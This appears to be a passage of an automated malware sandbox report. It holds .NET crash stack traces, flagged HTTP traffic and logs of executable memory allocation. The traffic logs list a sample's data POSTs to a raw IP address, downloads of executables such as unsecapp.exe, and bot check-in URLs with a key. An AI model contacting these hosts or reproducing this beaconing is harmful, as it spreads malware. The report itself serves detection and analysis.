__exception__ May 31, 2023, 5:47 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 0xc62e90 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xe50da0 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xc60e66 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xb0c070 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73ea7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73ea4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 4382972 registers.edi: 0 registers.eax: 4382972 registers.ebp: 4383052 registers.edx: 0 registers.ebx: 5691976 registers.esi: 5074032 registers.ecx: 650750694	1
__exception__ May 31, 2023, 5:48 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 0xc61536 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xc60e66 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xb0c070 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73ea7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73ea4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 4384288 registers.edi: 0 registers.eax: 4384288 registers.ebp: 4384368 registers.edx: 0 registers.ebx: 5691976 registers.esi: 5074032 registers.ecx: 650751430	1
__exception__ May 31, 2023, 5:48 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 0xc637c6 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xe50da0 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xc60e66 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xb0c070 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73ea7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73ea4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 4382972 registers.edi: 0 registers.eax: 4382972 registers.ebp: 4383052 registers.edx: 0 registers.ebx: 5691976 registers.esi: 5074032 registers.ecx: 650750694	1
__exception__ May 31, 2023, 5:48 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 0xc62e76 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xe50da0 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xc60e66 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xb0c070 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73ea7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73ea4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 4382972 registers.edi: 0 registers.eax: 4382972 registers.ebp: 4383052 registers.edx: 0 registers.ebx: 5691976 registers.esi: 5074032 registers.ecx: 650750694	1
__exception__ May 31, 2023, 5:48 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 0xc63899 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xe50da0 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xc60e66 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x2cf92a @ 0x721ef92a 0xb0bcf9 0xb0818b 0xb0c070 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73ea7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73ea4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 4382972 registers.edi: 0 registers.eax: 4382972 registers.ebp: 4383052 registers.edx: 0 registers.ebx: 5691976 registers.esi: 5074032 registers.ecx: 650750694	1
__exception__ May 31, 2023, 5:48 p.m.	stacktrace: 0x547ba14 0x547795e 0x5476b38 0x547685c 0x54746a0 0x5473e9c 0x54724b9 0x49b848f 0x49b7b01 0x49b7886 system+0x205d05 @ 0x717a5d05 system+0x205cdf @ 0x717a5cdf mscorlib+0x302367 @ 0x72222367 mscorlib+0x3022a6 @ 0x722222a6 mscorlib+0x302261 @ 0x72222261 system+0x205c60 @ 0x717a5c60 system+0x205467 @ 0x717a5467 mscorlib+0x34bb1e @ 0x7226bb1e DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x72ef9dd2 DllGetClassObjectInternal+0x74073 CorDllMainForThunk-0x18488 clr+0x1390ec @ 0x730190ec LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72f57d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72f57dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72f57e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72eec3bf DllGetClassObjectInternal+0x7412f CorDllMainForThunk-0x183cc clr+0x1391a8 @ 0x730191a8 DllGetClassObjectInternal+0x74178 CorDllMainForThunk-0x18383 clr+0x1391f1 @ 0x730191f1 GetMetaDataInternalInterfaceFromPublic+0xab22 PreBindAssemblyEx-0x982 clr+0x1771e9 @ 0x730571e9 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72ffa0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x547ca4e registers.esp: 95478316 registers.edi: 41956500 registers.eax: 0 registers.ebp: 95478348 registers.edx: 6938112 registers.ebx: 1 registers.esi: 41956716 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://78.47.9.120/so57Nst/index.php?scr=1
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://78.47.9.120/so57Nst/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://162.55.212.236/unsecapp.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://162.55.212.236/tcpupdate.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.159.189.105/bot/regex?key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.159.189.105/bot/online?guid=TEST22-PC&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34

Performs some HTTP requests (6 events)

request	POST http://78.47.9.120/so57Nst/index.php?scr=1
request	POST http://78.47.9.120/so57Nst/index.php
request	GET http://162.55.212.236/unsecapp.exe
request	GET http://162.55.212.236/tcpupdate.exe
request	GET http://45.159.189.105/bot/regex?key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
request	GET http://45.159.189.105/bot/online?guid=TEST22-PC&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34

Sends data using the HTTP POST Method (2 events)

request	POST http://78.47.9.120/so57Nst/index.php?scr=1
request	POST http://78.47.9.120/so57Nst/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 236 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 1984 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 1984 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000047b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2112 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00350000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00495000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00497000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
